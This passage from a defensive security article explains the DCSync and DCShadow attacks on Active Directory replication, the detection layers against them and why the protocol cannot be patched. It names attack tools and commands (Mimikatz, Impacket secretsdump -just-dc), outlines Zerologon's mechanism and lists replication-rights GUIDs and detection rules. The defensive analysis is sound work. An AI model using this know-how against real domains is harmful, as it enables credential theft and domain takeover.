  &apos;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2&apos;,
  &apos;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2&apos;,
]);
console.log(dcsyncAccessCheck(attacker, &apos;DC=contoso,DC=local&apos;,
  [&apos;unicodePwd&apos;, &apos;ntPwdHistory&apos;]));
`}&lt;/p&gt;
&lt;p&gt;Four generations, eleven years, no Generation 5 in sight. What is the single insight that lets all of this exist, and why has nobody patched it?&lt;/p&gt;
&lt;h2&gt;5. There Is No DC Check&lt;/h2&gt;
&lt;p&gt;The whole structural error of this protocol is one missing question. Specification [MS-DRSR] §4.1.10 defines the access check on &lt;code&gt;IDL_DRSGetNCChanges&lt;/code&gt; as: does the calling principal hold the rights triad on the naming context being replicated? [@ms-drsr-spec] That is the whole gate. There is no second check that asks &quot;is the caller&apos;s service principal name a domain-controller SPN?&quot; or &quot;is the caller&apos;s machine account in the &lt;code&gt;Domain Controllers&lt;/code&gt; group?&quot; or &quot;was the caller&apos;s Kerberos service ticket issued for a DC service?&quot; The spec is empirically and literally just an ACL check on the NC root.&lt;/p&gt;
&lt;p&gt;The empirical proof that a non-DC client succeeds lives in Mimikatz&apos;s &lt;code&gt;kuhl_m_lsadump.c&lt;/code&gt; and its DRSUAPI client surface in &lt;code&gt;kull_m_rpc_drsr*&lt;/code&gt; [@mimikatz-repo]. Mimikatz is software running on a workstation. It binds to the DRSUAPI interface UUID, calls &lt;code&gt;IDL_DRSGetNCChanges&lt;/code&gt;, and the call returns. The protocol&apos;s behavior is correct by specification. The security model is the bug.&lt;/p&gt;

A major feature added to Mimkatz in August 2015 is &apos;DCSync&apos; which effectively &apos;impersonates&apos; a Domain Controller and requests account password data from the targeted Domain Controller. DCSync was written by Benjamin Delpy and Vincent Le Toux. -- Sean Metcalf, ADSecurity, September 2015 [@sean-metcalf-dcsync-2015]
&lt;p&gt;Read Metcalf&apos;s verb carefully: &lt;em&gt;impersonates&lt;/em&gt;. The scare quotes are doing work. The Mimikatz client is not pretending to be a DC in any cryptographic sense. It is not forging a machine-account ticket. It is not spoofing an SPN. It is not bypassing any signature check.&lt;/p&gt;
&lt;p&gt;It is honestly making an authenticated call as the principal it actually is -- some user or service account that happens to hold the rights triad -- and the protocol honestly responds because its gate is satisfied. The &quot;impersonation&quot; framing is operator vocabulary borrowed from the social model the protocol was written under.&lt;/p&gt;
&lt;p&gt;The 1999 designers assumed only DCs would speak. By that social contract, anyone who speaks must be a DC. The spec encoded the social contract by way of &lt;em&gt;not encoding it at all&lt;/em&gt;. The ACL was the whole gate because, in 1999, the ACL was always satisfied by something that was always a DC.&lt;/p&gt;

flowchart TD
    Start[IDL_DRSGetNCChanges request arrives]
    Start --&amp;gt; Q1{&quot;Caller holds rights triad&lt;br /&gt;on the NC root?&quot;}
    Q1 -- yes --&amp;gt; Return[Return encrypted&lt;br /&gt;secret attributes]
    Q1 -- no --&amp;gt; Deny[ERROR_DS_DRA_ACCESS_DENIED]
    Start -.-&amp;gt; Absent[&quot;What the check does NOT ask:&lt;br /&gt;Is the caller a domain controller?&lt;br /&gt;Is the SPN a DC SPN?&lt;br /&gt;Is the machine in Domain Controllers?&quot;]
    Absent -.-&amp;gt; Nothing[no second gate exists]
&lt;p&gt;This is the article&apos;s intellectual fulcrum. The 1999 closed-population assumption -- only DCs speak this protocol -- survives in 2026 as an open-population reality (anyone with the rights speaks it), and the closed-population assumption is nowhere written down in the access-check code. The fix that would close the model would require a second gate. The spec did not write one. The implementation cannot synthesize one without breaking every legitimate consumer that already operates without one (more on this in §8).&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The protocol&apos;s design is correct. The security model is the bug. No patch can fix this without breaking Active Directory replication itself.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;There is a temptation, on first encountering this, to assume the missing gate is an oversight that Microsoft will eventually fix. That intuition is wrong, and it is wrong for a deeper reason than &quot;Microsoft has not gotten around to it.&quot; If the protocol is the bug and the protocol cannot be amended, what defenses can possibly work in 2026? That question carries us into the next section.&lt;/p&gt;
&lt;h2&gt;6. What 2026 Actually Ships Against This&lt;/h2&gt;
&lt;p&gt;If the protocol cannot be fixed, the defender&apos;s question is no longer &quot;how do I prevent DCSync?&quot; but &quot;which layer catches which class of attempt?&quot; Four production detection layers ship against this attack class in 2026. None of them is individually sufficient. A fifth layer -- the architectural one that would close the structural error -- does not exist and is not coming.&lt;/p&gt;
&lt;h3&gt;Posture: enumerate who holds the rights&lt;/h3&gt;
&lt;p&gt;The posture layer reads the static ACL on the Domain NC root and surfaces every principal that holds any of the three rights. Microsoft Defender for Identity ships this as an Accounts security posture assessment family, computed continuously from MDI&apos;s per-DC sensors [@mdi-security-posture-accounts]. Vincent Le Toux&apos;s PingCastle exposes it as the &lt;em&gt;C-DCSync&lt;/em&gt; finding in its critical-risks section. Tenable Identity Exposure exposes it as an indicator of exposure. Christopher Keim&apos;s 2025 practitioner guide documents the PowerShell pattern that AD administrators without a posture-tool license can run on demand [@keim-dcsync-rights]:&lt;/p&gt;
&lt;p&gt;{`&lt;/p&gt;
Illustrative model of the posture-layer check.
In production, replace SAMPLE_ACL with output from Get-Acl in PowerShell
or python-ldap against the live Domain NC root.
&lt;p&gt;GET_CHANGES          = &apos;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2&apos;
GET_CHANGES_ALL      = &apos;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2&apos;
GET_CHANGES_FILTERED = &apos;89e95b76-444d-4c62-991a-0facbeda640c&apos;
TRIAD = {GET_CHANGES, GET_CHANGES_ALL, GET_CHANGES_FILTERED}&lt;/p&gt;
&lt;p&gt;DEFAULTS = {
    &apos;BUILTIN\\Administrators&apos;,
    &apos;CONTOSO\\Domain Controllers&apos;,
    &apos;CONTOSO\\Domain Admins&apos;,
    &apos;CONTOSO\\Enterprise Admins&apos;,
    &apos;NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS&apos;,
}&lt;/p&gt;
&lt;p&gt;SAMPLE_ACL = [
    {&apos;principal&apos;: &apos;CONTOSO\\Domain Admins&apos;,     &apos;right&apos;: GET_CHANGES},
    {&apos;principal&apos;: &apos;CONTOSO\\Domain Admins&apos;,     &apos;right&apos;: GET_CHANGES_ALL},
    {&apos;principal&apos;: &apos;CONTOSO\\Enterprise Admins&apos;, &apos;right&apos;: GET_CHANGES},
    {&apos;principal&apos;: &apos;CONTOSO\\Enterprise Admins&apos;, &apos;right&apos;: GET_CHANGES_ALL},
    {&apos;principal&apos;: &apos;CONTOSO\\backup_svc_2017&apos;,   &apos;right&apos;: GET_CHANGES},
    {&apos;principal&apos;: &apos;CONTOSO\\backup_svc_2017&apos;,   &apos;right&apos;: GET_CHANGES_ALL},
    {&apos;principal&apos;: &apos;CONTOSO\\MSOL_a1b2c3&apos;,       &apos;right&apos;: GET_CHANGES},
    {&apos;principal&apos;: &apos;CONTOSO\\MSOL_a1b2c3&apos;,       &apos;right&apos;: GET_CHANGES_ALL},
]&lt;/p&gt;
&lt;p&gt;residual = {}
for ace in SAMPLE_ACL:
    if ace[&apos;right&apos;] in TRIAD and ace[&apos;principal&apos;] not in DEFAULTS:
        residual.setdefault(ace[&apos;principal&apos;], set()).add(ace[&apos;right&apos;])&lt;/p&gt;
&lt;p&gt;for principal, rights in residual.items():
    print(f&quot;{principal}: {len(rights)} of 3 replication rights&quot;)
`}&lt;/p&gt;
&lt;p&gt;The residual set is the operational unit of work. In a freshly-installed domain it is empty. In a ten-year-old forest with a history of mergers and migrations it typically contains five to twenty entries -- a mix of legitimately delegated identity-sync products and forgotten service accounts from projects nobody on the current operations team remembers.&lt;/p&gt;

In Microsoft&apos;s Enhanced Security Administrative Environment and the BloodHound conventions, the set of principals and assets whose compromise yields domain-wide control. The `krbtgt` account, members of `Domain Admins` and `Enterprise Admins`, the Entra ID Connect MSOL_ sync account, and any non-default principal holding the rights triad on the domain root are all Tier Zero by construction.

The Microsoft Entra ID (formerly Azure AD) Connect synchronization service account, created on-premises during Entra Connect installation. The account name uses an `MSOL_` prefix followed by a hex suffix. It legitimately holds the rights triad on the Domain NC root because it must replicate password hashes to the cloud directory; treating it as Tier Zero is the standard hardening recommendation.

Microsoft Defender for Identity&apos;s (and ATA&apos;s earlier) internal baseline of which computers in the domain legitimately speak DRSUAPI to which DCs. Incoming `IDL_DRSGetNCChanges` requests are matched against this baseline; a request from a source outside the list fires the External ID 2006 alert.
&lt;p&gt;An earlier scope document for this article quoted an MDI assessment titled verbatim &lt;em&gt;&quot;Remove non-admin accounts with DCSync permissions.&quot;&lt;/em&gt; That exact title does not appear on the live MDI Accounts security-posture-assessment page in 2026 [@mdi-security-posture-accounts][@mdi-security-posture-hybrid]. The surface exists -- MDI&apos;s Accounts and Hybrid security posture-assessment families together cover non-default principals with replication rights -- but the verbatim title was not reproducible.&lt;/p&gt;
&lt;h3&gt;Behavioral: catch the act after it fires&lt;/h3&gt;
&lt;p&gt;The behavioral layer watches network traffic and event logs for the act of DCSync or DCShadow as it happens. Microsoft&apos;s first-party stack lives in Defender for Identity and ships three canonical alerts [@mdi-alerts-classic]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;External ID 2006 -- &quot;Suspected DCSync attack (replication of directory services).&quot;&lt;/strong&gt; Credential Access (TA0006), Persistence (TA0003). Technique T1003.006. Severity High. Trigger: a replication request is initiated from a computer that is not a domain controller.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;External ID 2028 -- &quot;Suspected DCShadow attack (domain controller promotion).&quot;&lt;/strong&gt; Defense Evasion (TA0005). Technique T1207. Trigger: a machine in the network tries to register as a rogue domain controller.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;External ID 2029 -- &quot;Suspected DCShadow attack (domain controller replication request).&quot;&lt;/strong&gt; Defense Evasion (TA0005). Technique T1207. Trigger: a suspicious replication request is generated against a genuine domain controller, indicative of DCShadow.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The product lineage is Microsoft Advanced Threat Analytics 1.7 (April 2017, where DCSync was covered under the umbrella &quot;Unusual Protocol Implementation enhancements&quot; detection category [@ata-v17-release-notes]); Azure Advanced Threat Protection (2018, where Tali Ash&apos;s July 24, 2018 Microsoft Tech Community post announced the two named DCShadow detections that became 2028 and 2029 [@tali-ash-azure-atp-dcshadow]); and Defender for Identity (the Microsoft Ignite 2020 rebrand, week of September 22-24, 2020 [@rcpmag-defender-rebrand]). The detection content carries forward unchanged across product renamings; what changes is the portal it surfaces in [@mdi-whats-new].&lt;/p&gt;
&lt;p&gt;Open-source SIEM equivalents implement the same detection via Event ID 4662 on the domain object. The Sigma rule &lt;em&gt;Mimikatz DC Sync&lt;/em&gt; (id &lt;code&gt;611eab06-a145-4dfa-a295-3ccc5c20f59a&lt;/code&gt;) fires on Event ID 4662 where &lt;code&gt;Properties&lt;/code&gt; contains any of the three rights GUIDs or the literal string &lt;em&gt;Replicating Directory Changes All&lt;/em&gt;, with &lt;code&gt;AccessMask=0x100&lt;/code&gt; [@sigma-rule-dcsync]. Splunk&apos;s parallel detection &lt;em&gt;Windows AD Replication Request Initiated by User Account&lt;/em&gt; (rule &lt;code&gt;51307514-1236-49f6-8686-d46d93cc2821&lt;/code&gt;) implements the equivalent SPL search with the same MITRE T1003.006 annotation and the same known-false-positive list (Azure AD Connect, &lt;code&gt;dcdiag.exe /Test:Replications&lt;/code&gt;) [@splunk-research-dcsync].&lt;/p&gt;
&lt;p&gt;The SACL-event detection layer (Sigma + Splunk + every other SIEM-side implementation) requires that the operator first enable Advanced Security Audit policy &lt;code&gt;Audit Directory Services Access&lt;/code&gt; under &lt;code&gt;DS Access&lt;/code&gt;, with SACLs on the domain root auditing the three rights against &lt;code&gt;Everyone&lt;/code&gt;, &lt;code&gt;Domain Computers&lt;/code&gt;, and &lt;code&gt;Domain Controllers&lt;/code&gt;. A fresh-install AD does not have these SACLs by default [@splunk-research-dcsync]. The detection rule&apos;s documentation calls out the prerequisite explicitly; many operators discover it only after wondering why their Splunk dashboard is silent.&lt;/p&gt;
&lt;h3&gt;Network: NDR on the DRSUAPI interface&lt;/h3&gt;
&lt;p&gt;The network layer parses DCE/RPC traffic on the wire, identifies the DRSUAPI interface by its UUID, and fires when an &lt;code&gt;IDL_DRSGetNCChanges&lt;/code&gt; call originates from a source outside the legitimate-DC baseline. The canonical 2025 reference is Trellix Advanced Research Center&apos;s &lt;em&gt;&quot;Silent Domain Hijack: Uncovering the DCSync Attack and Detecting with Trellix NDR&quot;&lt;/em&gt;, published in week 50 of 2025 [@trellix-silent-domain-hijack]. Equivalent capability ships in Microsoft Defender for Identity&apos;s network analytics layer (the same sensor that powers External ID 2006) [@mdi-alerts-classic].&lt;/p&gt;
&lt;p&gt;The Trellix writeup is explicit about the architecture: &lt;em&gt;&quot;Trellix NDR detects replication protocol abuse by analyzing abnormal DCE/RPC and MS-DRSR traffic. It detects DCSync-like behavior when replication requests are sent from non-DC hosts or unusual users&quot;&lt;/em&gt; [@trellix-silent-domain-hijack]. The detection is independent of host-side telemetry, so it survives EDR tampering and works in environments where a DC is un-sensored from MDI&apos;s perspective.&lt;/p&gt;
&lt;h3&gt;Graph: BloodHound traverses the permission graph&lt;/h3&gt;
&lt;p&gt;The graph layer was built specifically for Generation 4. BloodHound, originally released by Andy Robbins, Rohan Vazarkar, and Will Schroeder at DEF CON 24 on August 6, 2016, models &lt;em&gt;&quot;you have DCSync rights to the domain&quot;&lt;/em&gt; as a directed edge from a principal to the domain node, computed by combining the separately-collected &lt;code&gt;GetChanges&lt;/code&gt; and &lt;code&gt;GetChangesAll&lt;/code&gt; ACEs through nested-group membership [@wald0-bloodhound-intro][@defcon24-bloodhound-pdf][@bloodhound-edge-dcsync]. An operator queries &lt;em&gt;&quot;shortest path from any compromised principal to the DCSync edge into a Domain node&quot;&lt;/em&gt; and gets back every transitive route into the rights triad.&lt;/p&gt;
&lt;p&gt;The 2024-2026 release cadence is dense and matters:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;BloodHound v6.0 (September 30, 2024)&lt;/strong&gt; improved logic for identifying and creating complex edges requiring multiple permissions, including DCSync, when &lt;code&gt;Authenticated Users&lt;/code&gt; or &lt;code&gt;Everyone&lt;/code&gt; groups are involved [@bloodhound-v6-0-release-notes]. This closed a long-standing blind spot in which rights granted to a wildcard principal (the worst kind of delegation drift, often dating from compatibility settings in pre-2003 forests) were not surfaced as DCSync edges.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;BloodHound v6.3 (December 9, 2024)&lt;/strong&gt; introduced the &lt;em&gt;Butterfly&lt;/em&gt; algorithm -- bi-directional risk analysis. Where the historical query was &lt;em&gt;&quot;which principals can attack this target?&quot;&lt;/em&gt;, Butterfly adds &lt;em&gt;&quot;which targets can be attacked from this compromised principal?&quot;&lt;/em&gt; SpecterOps describes the algorithm in their blog post &lt;em&gt;Unwrapping BloodHound v6.3 with Impact Analysis&lt;/em&gt;: &lt;em&gt;&quot;This is a massive upgrade to BloodHound Enterprise&apos;s risk analysis capability with a new algorithm we call &apos;Butterfly&apos;&quot;&lt;/em&gt; [@specterops-butterfly-blog][@bloodhound-v6-3-release-notes].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;BloodHound v8.0 (July 29, 2025)&lt;/strong&gt; introduced &lt;em&gt;OpenGraph&lt;/em&gt;, generalizing the graph engine to model attack paths across non-AD systems (GitHub, 1Password, NPM, Snowflake) using the same Cypher front-end. The DCSync edge remains AD-specific; OpenGraph&apos;s relevance is that hybrid-cloud principals can now be modeled end-to-end [@bloodhound-v8-0-release-notes].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The graph layer is the only one that catches multi-hop chains to the rights triad. A principal A with &lt;code&gt;GenericAll&lt;/code&gt; on group B, where B has the DCSync triad, is invisible to MDI&apos;s posture assessment but stands out as a one-hop path in BloodHound.&lt;/p&gt;

flowchart TD
    subgraph Posture[Posture layer]
        P1[MDI Accounts assessments]
        P2[PingCastle C-DCSync]
        P3[Keim PowerShell pattern]
    end
    subgraph Behavioral[Behavioral layer]
        B1[MDI 2006 / 2028 / 2029]
        B2[Sigma 611eab06]
        B3[Splunk 51307514]
    end
    subgraph Network[Network layer NDR]
        N1[Trellix NDR]
        N2[MDI per-DC sensor]
        N3[CrowdStrike DCE/RPC IoA]
    end
    subgraph Graph[Graph layer]
        G1[BloodHound DCSync edge]
        G2[v6.3 Butterfly Impact]
        G3[v8.0 OpenGraph]
    end
    P1 --&amp;gt; SOC[SOC alert queue]
    P2 --&amp;gt; SOC
    P3 --&amp;gt; SOC
    B1 --&amp;gt; SOC
    B2 --&amp;gt; SOC
    B3 --&amp;gt; SOC
    N1 --&amp;gt; SOC
    N2 --&amp;gt; SOC
    N3 --&amp;gt; SOC
    G1 --&amp;gt; SOC
    G2 --&amp;gt; SOC
    G3 --&amp;gt; SOC
&lt;p&gt;The full layer-by-layer comparison is the load-bearing matrix of the entire 2026 SOTA:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;What it inputs&lt;/th&gt;
&lt;th&gt;What it detects&lt;/th&gt;
&lt;th&gt;What it misses&lt;/th&gt;
&lt;th&gt;False-positive class&lt;/th&gt;
&lt;th&gt;Detection latency&lt;/th&gt;
&lt;th&gt;Cost&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Posture&lt;/td&gt;
&lt;td&gt;NC-root ACL&lt;/td&gt;
&lt;td&gt;Direct grant of the rights triad to a non-default principal&lt;/td&gt;
&lt;td&gt;Multi-hop transitive paths; legitimate-principal abuse&lt;/td&gt;
&lt;td&gt;Identity-sync products (Entra Connect MSOL_, third-party HR-IDM); legitimately delegated backup agents&lt;/td&gt;
&lt;td&gt;24h score recomputation; ACE changes near real time&lt;/td&gt;
&lt;td&gt;Built in to MDI; PowerShell variant free&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Behavioral&lt;/td&gt;
&lt;td&gt;Event ID 4662 or sensor-captured DRSUAPI traffic&lt;/td&gt;
&lt;td&gt;The act of DCSync, or the DCShadow registration / replication, after it happens&lt;/td&gt;
&lt;td&gt;Pre-attack staging; compromised-DC speaker; un-sensored DC blind spot&lt;/td&gt;
&lt;td&gt;Azure AD Connect syncs; &lt;code&gt;dcdiag.exe /Test:Replications&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Minutes (alert &quot;after the fact&quot;)&lt;/td&gt;
&lt;td&gt;MDI license; Sigma / Splunk free with SACL config&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Network&lt;/td&gt;
&lt;td&gt;DCE/RPC packet capture&lt;/td&gt;
&lt;td&gt;Wire signature of &lt;code&gt;IDL_DRSGetNCChanges&lt;/code&gt; from non-DC source&lt;/td&gt;
&lt;td&gt;Encrypted RPC payloads (per-principal granularity); sub-DC replicas misclassified&lt;/td&gt;
&lt;td&gt;Same as behavioral plus Samba-DC peers&lt;/td&gt;
&lt;td&gt;Seconds (passive inspection)&lt;/td&gt;
&lt;td&gt;Commercial NDR appliance&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Graph&lt;/td&gt;
&lt;td&gt;LDAP-collected ACEs and group nesting&lt;/td&gt;
&lt;td&gt;Multi-hop graph paths that could reach the rights triad&lt;/td&gt;
&lt;td&gt;Net-new ACEs created after the last collection&lt;/td&gt;
&lt;td&gt;Stale data showing principals that no longer hold the right&lt;/td&gt;
&lt;td&gt;Hours to weeks (collection cadence)&lt;/td&gt;
&lt;td&gt;BloodHound CE free; BHE commercial&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Architectural (un-shipped)&lt;/td&gt;
&lt;td&gt;TPM-attested DC machine identity&lt;/td&gt;
&lt;td&gt;Pre-empts non-DC speaker entirely&lt;/td&gt;
&lt;td&gt;Compromised DC speaker; rogue &lt;code&gt;nTDSDSA&lt;/code&gt; registration&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;N/A (preventive)&lt;/td&gt;
&lt;td&gt;Requires Microsoft protocol amendment&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Four layers, dozens of products, no shortage of detections. Why isn&apos;t the problem solved?&lt;/p&gt;
&lt;h2&gt;7. Which Gap Does Each Defense Close?&lt;/h2&gt;
&lt;p&gt;The matrix in §6 has one structural observation that earns its keep. Read down the &lt;em&gt;What it misses&lt;/em&gt; column. Each detection layer has a class of cases it cannot see. The posture layer cannot see transitive paths. The behavioral layer cannot see pre-attack staging or compromised-DC speakers. The network layer cannot see encrypted RPC payloads. The graph layer cannot see net-new ACEs created after the last collection. That is the load-bearing reason a mature defender runs all four in parallel instead of picking one.&lt;/p&gt;
&lt;p&gt;Run a thought experiment. Suppose you ship only the posture layer. Your MDI assessment is green: no non-default principals hold the rights triad. An attacker compromises a workstation belonging to an unrelated business unit, finds that the BU has &lt;code&gt;GenericAll&lt;/code&gt; on a group &lt;code&gt;LegacyApp_Operators&lt;/code&gt; that itself has &lt;code&gt;WriteDACL&lt;/code&gt; on the &lt;code&gt;BackupOperators&lt;/code&gt; group, and adds themselves to &lt;code&gt;BackupOperators&lt;/code&gt;. &lt;code&gt;BackupOperators&lt;/code&gt; inherits a forgotten 2014 delegation of the rights triad through three levels of nesting. Then DCSync runs.&lt;/p&gt;
&lt;p&gt;The posture layer never saw this because the residual list at the NC root is the four defaults. The graph layer would have surfaced the path. The behavioral or network layer would have fired the moment the DCSync call hit the wire. Without those layers, your green dashboard is a single-layer fantasy.&lt;/p&gt;
&lt;p&gt;Now consider the inverse. You ship only the behavioral layer. MDI fires External ID 2006 -- but only after the request hits the DC. Your SOC&apos;s mean response time is twelve minutes. The attacker&apos;s mean &lt;em&gt;complete-the-extraction&lt;/em&gt; time is sixty seconds. The detection is real; the response window is not.&lt;/p&gt;
&lt;p&gt;The same structural observation applies on the attack side. The four attack primitives have very different precondition costs:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Attack primitive&lt;/th&gt;
&lt;th&gt;Pre-condition&lt;/th&gt;
&lt;th&gt;Output&lt;/th&gt;
&lt;th&gt;Default detection layer&lt;/th&gt;
&lt;th&gt;Tier of damage&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;DCSync via Mimikatz&lt;/td&gt;
&lt;td&gt;Rights triad on NC root&lt;/td&gt;
&lt;td&gt;Every secret-attribute value for one or all principals&lt;/td&gt;
&lt;td&gt;MDI 2006; Sigma 611eab06; Splunk 51307514; NDR&lt;/td&gt;
&lt;td&gt;Domain takeover (via Golden Ticket from &lt;code&gt;krbtgt&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DCSync via Impacket&lt;/td&gt;
&lt;td&gt;Same as Mimikatz; no on-target binary footprint&lt;/td&gt;
&lt;td&gt;Same as Mimikatz, plus PtH / PtT auth modes&lt;/td&gt;
&lt;td&gt;Same as Mimikatz (wire signature is identical)&lt;/td&gt;
&lt;td&gt;Domain takeover&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DCShadow&lt;/td&gt;
&lt;td&gt;Domain Admin, local administrator on a DC, or &lt;code&gt;KRBTGT&lt;/code&gt; hash (for rogue-DC registration) [@mitre-t1207][@dcshadow-com]&lt;/td&gt;
&lt;td&gt;Arbitrary directory write, SACL-silent&lt;/td&gt;
&lt;td&gt;MDI 2028 + 2029&lt;/td&gt;
&lt;td&gt;Domain persistence (SID-history, AdminSDHolder ACE re-grant)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen-4 chains&lt;/td&gt;
&lt;td&gt;Any ACE that transitively leads to the triad&lt;/td&gt;
&lt;td&gt;Reach DCSync, then DCSync&apos;s output&lt;/td&gt;
&lt;td&gt;BloodHound DCSync edge inbound paths&lt;/td&gt;
&lt;td&gt;Domain takeover (composite)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;DCSync via Mimikatz and via Impacket [@impacket-secretsdump] share the &lt;em&gt;output&lt;/em&gt; (domain takeover via credential theft) and the &lt;em&gt;default detection&lt;/em&gt; (the wire signature is the same). Their pre-conditions are identical. The Hacker Recipes documents Impacket&apos;s invocation surface for both pass-the-hash and pass-the-ticket modes [@hacker-recipes-dcsync]. This is why Impacket&apos;s &lt;code&gt;secretsdump.py -just-dc&lt;/code&gt; has become the universal red-team and IR tool, while Mimikatz remains the reference implementation that every blue-team detection still names.&lt;/p&gt;
&lt;p&gt;The Generation-4 row is the interesting one. Its pre-condition is dramatically cheaper than the other three (&lt;em&gt;any&lt;/em&gt; ACE that leads to the triad, rather than the triad in hand). Its detection is by graph traversal, not by wire signature. This is why the 2024-2026 frontier in this space has been the graph layer: the attack-side cost asymmetry favors the chain-finding problem, so the defense-side investment has landed there.&lt;/p&gt;

A reader who has internalized the &quot;no DC check&quot; observation will naturally ask: surely the obvious architectural fix is to add a caller-machine-identity check? CVE-2020-1472, popularly known as Zerologon, is the counterexample. Secura&apos;s September 2020 whitepaper, published approximately one month after Microsoft&apos;s August 11, 2020 patch, documented that the Netlogon protocol&apos;s `ComputeNetlogonCredential` AES-CFB8 implementation used an all-zero initialization vector. An attacker who sends an all-zero `ClientChallenge` exploits the IV bug to authenticate with roughly 1-in-256 probability per attempt, then calls `NetrServerPasswordSet2` to reset the DC&apos;s machine account password (commonly to all zeros) and becomes that DC for protocol purposes [@secura-zerologon-whitepaper]. After Zerologon-class compromise, the attacker *is* a DC. Any architectural caller-machine-identity check on `IDL_DRSGetNCChanges` would have been satisfied. Zerologon is the canonical worked proof that promoting the access-check from &quot;rights&quot; to &quot;rights and DC identity&quot; raises the bar but does not change the class.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Every detection layer in this space has a class of cases it cannot see. Mature defenders run all four (posture, behavioral, network, graph) because each layer is the only answer for a specific class of inputs, and accept that the un-shipped fifth layer (architectural) would only narrow the gap, not close it. Single-layer deployments produce confident but incomplete coverage.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If even the hypothetical perfect architectural fix would not close the class, what are the actual theoretical limits of any possible defense?&lt;/p&gt;
&lt;h2&gt;8. Why the Protocol Cannot Be Fixed&lt;/h2&gt;
&lt;p&gt;Two structural ceilings bound any conceivable MS-DRSR amendment. Both are provable from the specification&apos;s own definition of what it must do; both have been corroborated by the post-2018 industry consensus that &lt;em&gt;detection&lt;/em&gt; (not prevention) is the only viable defender posture.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ceiling 1: replicated secret material is the data the protocol exists to carry.&lt;/strong&gt; MS-DRSR is the mechanism by which Active Directory&apos;s multi-master replication invariant holds. If &lt;code&gt;IDL_DRSGetNCChanges&lt;/code&gt; did not return secret attributes -- &lt;code&gt;unicodePwd&lt;/code&gt;, &lt;code&gt;dBCSPwd&lt;/code&gt;, &lt;code&gt;ntPwdHistory&lt;/code&gt;, &lt;code&gt;lmPwdHistory&lt;/code&gt;, &lt;code&gt;supplementalCredentials&lt;/code&gt; -- then a password change on DC-A would not converge to DC-B within the replication interval. AD&apos;s &lt;em&gt;&quot;any DC accepts any write and the others catch up within minutes&quot;&lt;/em&gt; property would collapse [@ms-drsr-spec]. The protocol cannot stop returning secrets without ceasing to be the protocol. This is why &quot;disable MS-DRSR&quot; appears on every list of options that look attractive in a slide deck and break replication in production within minutes of being applied.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ceiling 2: a machine-identity check on the caller would shift the attack class, not close it.&lt;/strong&gt; Suppose Microsoft amended the access check on &lt;code&gt;IDL_DRSGetNCChanges&lt;/code&gt; to require, in addition to the rights triad, a cryptographic proof that the caller&apos;s machine account is in the &lt;code&gt;Domain Controllers&lt;/code&gt; group -- for example, that the call was made under a Kerberos service ticket issued for a DC SPN. This would defeat the Mimikatz-from-workstation case. It would also defeat every legitimate integration that today holds the rights triad on a non-DC service account: the Entra ID Connect MSOL_ account, third-party HR identity-management connectors, every backup and disaster-recovery tool that integrates at the AD level.&lt;/p&gt;
&lt;p&gt;Worse, the new check would shift the attack class to &lt;em&gt;compromising a DC&apos;s machine account&lt;/em&gt; -- CVE-2020-1472 Zerologon being the canonical worked example (see the §7 Aside for the mechanism). After a Zerologon-class compromise the attacker &lt;em&gt;is&lt;/em&gt; a DC, so promoting the speaker check from (rights) to (rights and DC-identity) raises the bar but does not change the class [@secura-zerologon-whitepaper].&lt;/p&gt;

flowchart TD
    Fix[Proposed MS-DRSR fix]
    Fix --&amp;gt; A[Stop returning secrets&lt;br /&gt;in IDL_DRSGetNCChanges]
    Fix --&amp;gt; B[Add machine-identity check&lt;br /&gt;on the caller]
    A --&amp;gt; A1[AD multi-master replication breaks&lt;br /&gt;password changes do not propagate]
    B --&amp;gt; B1[Legitimate integrations break&lt;br /&gt;MSOL_ account, HR IDM, backup tools]
    B --&amp;gt; B2[Attack shifts to compromised DC&lt;br /&gt;machine accounts e.g. Zerologon&lt;br /&gt;CVE-2020-1472]
